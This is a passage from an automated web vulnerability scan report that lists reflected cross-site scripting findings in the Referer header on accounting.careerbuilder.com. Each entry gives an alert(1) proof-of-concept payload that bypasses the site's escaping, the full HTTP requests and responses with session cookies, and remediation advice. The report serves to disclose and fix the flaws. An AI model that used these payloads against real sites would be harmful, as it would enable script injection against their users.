The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /JobSeeker/Jobs/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=114ab\'%3balert(1)//117bf833582

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186387
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: jobresults.aspx:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR37
Date: Sun, 14 Nov 2010 23:28:24 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Job Se
...[SNIP]...
='Job Results';
s_cb.eVar5='JS_AS_Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', ';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 114ab\\';alert(1)//117bf833582';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.254. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56918\'%3balert(1)//e3aa076828a was submitted in the Referer HTTP header. This input was echoed as 56918\\';alert(1)//e3aa076828a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=56918\'%3balert(1)//e3aa076828a

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179849
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:17:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
lts';
s_cb.eVar5='JS_AS_State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 56918\\';alert(1)//e3aa076828a';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.255. http://accounting.careerbuilder.com/ag.ic/Florida/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6309b\'%3balert(1)//59d7ac59f1b was submitted in the Referer HTTP header. This input was echoed as 6309b\\';alert(1)//59d7ac59f1b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=6309b\'%3balert(1)//59d7ac59f1b

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 180061
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 23:00:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
lts';
s_cb.eVar5='JS_AS_State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14=', FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 6309b\\';alert(1)//59d7ac59f1b';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.256. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f480a\'%3balert(1)//b802c5c94bd was submitted in the Referer HTTP header. This input was echoed as f480a\\';alert(1)//b802c5c94bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=f480a\'%3balert(1)//b802c5c94bd

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176225
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR41
Date: Sun, 14 Nov 2010 23:00:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - f480a\\';alert(1)//b802c5c94bd';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.257. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64d8c\'%3balert(1)//f4ef47d3f32 was submitted in the Referer HTTP header. This input was echoed as 64d8c\\';alert(1)//f4ef47d3f32 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=64d8c\'%3balert(1)//f4ef47d3f32

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176040
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:12:28 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 64d8c\\';alert(1)//f4ef47d3f32';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.258. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9545f\'%3balert(1)//6cfbcaa7226 was submitted in the Referer HTTP header. This input was echoed as 9545f\\';alert(1)//6cfbcaa7226 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9545f\'%3balert(1)//6cfbcaa7226

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176553
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=cbcb0fadca3b47c1a9569e6e471e16f6-343070704-RF-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650561189DB47D6ABB196DB4CB014BD6697662C7951FB969626D18C76975F0BABBE1A91E862CEC15D12; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:03 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL15
Date: Sun, 14 Nov 2010 22:25:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar8='JS_FindJobs - Job Results';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 9545f\\';alert(1)//6cfbcaa7226';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.259. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45845\'%3balert(1)//4dd1c60a594 was submitted in the Referer HTTP header. This input was echoed as 45845\\';alert(1)//4dd1c60a594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/ HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=45845\'%3balert(1)//4dd1c60a594

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176514
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=29994ae3a58f499198496a89a94deeb1-343070587-R3-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650E3907A73E359AD0C717375E6A181228710E52CC9569A7C897CB7D71421C75C1B4E5777777724DBD7; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:23:06 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:38:07 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL3
Date: Sun, 14 Nov 2010 22:23:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar8='JS_FindJobs - Job Results';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 45845\\';alert(1)//4dd1c60a594';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.260. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/JobResults.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/JobResults.aspx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 480ef\'%3balert(1)//4797d19bb95 was submitted in the Referer HTTP header. This input was echoed as 480ef\\';alert(1)//4797d19bb95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami/JobResults.aspx HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=480ef\'%3balert(1)//4797d19bb95

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42228
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:56:12 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   404 Fi
...[SNIP]...
Name='accounting.careerbuilder.com/404.aspx';
s_cb.server='accounting';
s_cb.eVar11='NotRegistered';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 480ef\\';alert(1)//4797d19bb95';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.261. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1da0c\'%3balert(1)//d1efdea3b87 was submitted in the Referer HTTP header. This input was echoed as 1da0c\\';alert(1)//d1efdea3b87 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ag.ic/Florida_Miami_Accounting.htm?IPath=OCP&lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&ff=21 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;
Referer: http://www.google.com/search?hl=en&q=1da0c\'%3balert(1)//d1efdea3b87

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 174866
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami_accounting.htm:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 23:16:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
s_cb.eVar5='JS_AS_City | State | Job Type';
s_cb.eVar11='NotRegistered';
s_cb.eVar14='Miami, FL';
s_cb.eVar15='NO_NotRegistered';
s_cb.eVar16='natural (google) - 1da0c\\';alert(1)//d1efdea3b87';
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s_cb.t();if(s_code)document.write(s_code)//-->
...[SNIP]...

2.262. http://accounting.careerbuilder.com/ag.ic/Florida_Miami_Accounting.htm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami_Accounting.htm

Issue detail

